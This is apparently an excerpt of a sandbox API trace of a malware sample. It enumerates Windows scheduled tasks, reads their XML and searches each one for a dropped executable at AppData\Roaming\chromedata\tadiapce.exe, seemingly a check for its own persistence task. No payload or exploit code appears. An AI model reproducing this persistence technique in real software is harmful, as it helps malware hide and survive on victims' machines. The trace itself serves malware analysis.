	[0073.545] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\System32\\DFDTS.dll,-101)</Author>\r\n    <Source>$(@%SystemRoot%\\System32\\DFDTS.dll,-100)</Source>\r\n    <URI>Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticDataCollector</URI>\r\n    <SecurityDescriptor>D:(A;;GA;;;BA)(A;;GA;;;SY)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\DFDTS.dll,-119)</Description>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <WakeToRun>false</WakeToRun>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n    </IdleSettings>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <Hidden>true</Hidden>\r\n  </Settings>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2004-01-01T01:00:00</StartBoundary>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Sunday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>2</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>dfdts.dll,DfdGetDefaultPolicyAndSMART</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.547] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\System32\\DFDTS.dll,-101)</Author>\r\n    <Source>$(@%SystemRoot%\\System32\\DFDTS.dll,-100)</Source>\r\n    <URI>Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticDataCollector</URI>\r\n    <SecurityDescriptor>D:(A;;GA;;;BA)(A;;GA;;;SY)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\DFDTS.dll,-119)</Description>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <WakeToRun>false</WakeToRun>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n    </IdleSettings>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <Hidden>true</Hidden>\r\n  </Settings>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2004-01-01T01:00:00</StartBoundary>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Sunday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>2</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>dfdts.dll,DfdGetDefaultPolicyAndSMART</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.547] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.547] IRegisteredTaskCollection:get_Item (in: This=0x55fed8, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.547] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="Microsoft-Windows-DiskDiagnosticResolver") returned 0x0
	[0073.547] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\System32\\DFDTS.dll,-101)</Author>\r\n    <Source>$(@%SystemRoot%\\System32\\DFDTS.dll,-100)</Source>\r\n    <URI>Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticResolver</URI>\r\n    <SecurityDescriptor>D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\DFDTS.dll,-118)</Description>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Enabled>false</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>true</Hidden>\r\n  </Settings>\r\n  <Triggers>\r\n    <LogonTrigger />\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AllUsers\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\DFDWiz.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.549] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\System32\\DFDTS.dll,-101)</Author>\r\n    <Source>$(@%SystemRoot%\\System32\\DFDTS.dll,-100)</Source>\r\n    <URI>Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticResolver</URI>\r\n    <SecurityDescriptor>D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\DFDTS.dll,-118)</Description>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Enabled>false</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>true</Hidden>\r\n  </Settings>\r\n  <Triggers>\r\n    <LogonTrigger />\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AllUsers\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\DFDWiz.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.549] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.549] IUnknown:Release (This=0x55fed8) returned 0x0
	[0073.549] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fed8) returned 0x0
	[0073.549] ITaskFolderCollection:get_Count (in: This=0x55fed8, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.549] IUnknown:Release (This=0x55fed8) returned 0x0
	[0073.549] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.549] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0xb, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.549] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fec8) returned 0x0
	[0073.550] IRegisteredTaskCollection:get_Count (in: This=0x55fec8, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.550] IRegisteredTaskCollection:get_Item (in: This=0x55fec8, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.550] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="Notifications") returned 0x0
	[0073.550] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Description>$(@%systemRoot%\\system32\\LocationNotifications.exe,-102)</Description>\r\n    <URI>Microsoft\\Windows\\Location\\Notifications</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)</SecurityDescriptor>\r\n    <Version>1.3</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"Application\"&gt;&lt;Select Path=\"Application\"&gt;*[System[Provider[@Name='LocationNotifications'] and EventID=1]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Creator\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Creator\">\r\n    <Exec>\r\n      <Command>%windir%\\System32\\LocationNotifications.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.551] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Description>$(@%systemRoot%\\system32\\LocationNotifications.exe,-102)</Description>\r\n    <URI>Microsoft\\Windows\\Location\\Notifications</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)</SecurityDescriptor>\r\n    <Version>1.3</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"Application\"&gt;&lt;Select Path=\"Application\"&gt;*[System[Provider[@Name='LocationNotifications'] and EventID=1]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Creator\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Creator\">\r\n    <Exec>\r\n      <Command>%windir%\\System32\\LocationNotifications.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.552] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.552] IUnknown:Release (This=0x55fec8) returned 0x0
	[0073.552] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fec8) returned 0x0
	[0073.552] ITaskFolderCollection:get_Count (in: This=0x55fec8, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.552] IUnknown:Release (This=0x55fec8) returned 0x0
	[0073.552] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.552] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0xc, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.552] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fed0) returned 0x0
	[0073.553] IRegisteredTaskCollection:get_Count (in: This=0x55fed0, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.553] IRegisteredTaskCollection:get_Item (in: This=0x55fed0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.553] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="WinSAT") returned 0x0
	[0073.553] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\winsatapi.dll,-113)</Source>\r\n    <Date>2008-02-25T19:15:00</Date>\r\n    <Author>$(@%systemroot%\\system32\\winsatapi.dll,-112)</Author>\r\n    <Description>$(@%systemroot%\\system32\\winsatapi.dll,-114)</Description>\r\n    <URI>Microsoft\\Windows\\Maintenance\\WinSAT</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-01-01T01:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Sunday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"$creator\">\r\n      <GroupId>S-1-5-32-544</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"$creator\">\r\n    <ComHandler>\r\n      <ClassId>{A9A33436-678B-4C9C-A211-7CC38785E79D}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.555] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\winsatapi.dll,-113)</Source>\r\n    <Date>2008-02-25T19:15:00</Date>\r\n    <Author>$(@%systemroot%\\system32\\winsatapi.dll,-112)</Author>\r\n    <Description>$(@%systemroot%\\system32\\winsatapi.dll,-114)</Description>\r\n    <URI>Microsoft\\Windows\\Maintenance\\WinSAT</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-01-01T01:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Sunday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"$creator\">\r\n      <GroupId>S-1-5-32-544</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"$creator\">\r\n    <ComHandler>\r\n      <ClassId>{A9A33436-678B-4C9C-A211-7CC38785E79D}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.555] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.555] IUnknown:Release (This=0x55fed0) returned 0x0
	[0073.555] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fed0) returned 0x0
	[0073.555] ITaskFolderCollection:get_Count (in: This=0x55fed0, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.555] IUnknown:Release (This=0x55fed0) returned 0x0
	[0073.555] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.555] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0xd, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.556] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fed0) returned 0x0
	[0073.557] IRegisteredTaskCollection:get_Count (in: This=0x55fed0, pCount=0x128e30 | out: pCount=0x128e30*=21) returned 0x0
	[0073.557] IRegisteredTaskCollection:get_Item (in: This=0x55fed0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.557] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="ActivateWindowsSearch") returned 0x0
	[0073.557] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ActivateWindowsSearch</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoActivateWindowsSearch</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.560] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ActivateWindowsSearch</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoActivateWindowsSearch</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.560] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.560] IRegisteredTaskCollection:get_Item (in: This=0x55fed0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.560] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="ConfigureInternetTimeService") returned 0x0
	[0073.560] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ConfigureInternetTimeService</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-23)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoConfigureInternetTimeService</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
